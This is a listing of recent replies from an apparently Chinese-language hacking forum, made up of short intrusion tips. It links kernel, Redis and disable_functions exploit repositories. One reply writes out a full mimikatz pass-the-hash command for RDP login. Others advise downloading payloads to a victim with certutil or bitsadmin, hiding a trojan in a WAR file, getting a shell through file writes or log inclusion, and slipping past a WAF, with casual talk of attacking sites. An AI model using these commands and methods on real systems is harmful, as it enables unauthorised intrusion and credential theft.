最新回复

  • 帖子作者
    回复
  • #860380

    可以试下https://github.com/SecWiki/linux-kernel-exploits

  • #860179

    https://github.com/Dliv3/redis-rogue-server

  • #859630

    是啥系统呢??如果是windows2012是抓不到hash和明文的

  • #861473

    搞站不就这样吗?一把哈,搞不定就换下一个

  • #857743

    都是存在于直自己美好的遐想当中

  • #856559

    Xposed+JustTrustMe试试????

  • #855020

    利用mimikaz:privilege::debugsekurlsa::pth /user:administrator /domain:. /ntlm:xxxxxxxxxxxxxxxxxxxxxx "/run:mstsc.exe /restrictedadmin"执行后弹出远程登录,输入地址后登录

  • #853611

    只有注入没有命令执行·

  • #853409

    没看懂你啥意思是这种?????

  • #852919

    看来这个waf只对文件内容做拦截,并未对流量拦截。。

  • #852091

    自己搭建个邮件服务器,用Swaks发送。

  • #852003

    能执行命令的话,可以通过vbs/ftp/certutil/bitsadmin等方法远程下载过去。。

  • #849302

    准备一个这样的xml文件然后把木马放到同目录然后压缩zip改成个war

  • #848622

    了解一下cs.3.13,参数欺骗的功能。

  • #847054

    貌似我以前见过这个软件。。。

  • #846815

    还是先考虑通过file_put_contents或者include包含log日志或者其他的拿到shell后两个方法论坛有文章。再考虑bypass disfuction

  • #843508

    参考:http://blog.liujason.com/2832.html

  • #843549

    回复 11# NO.THINKING 应该就是内存不够嘚原因

  • #843517

    用眼睛看!吃瓜

  • #842467

    github:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

Top ↑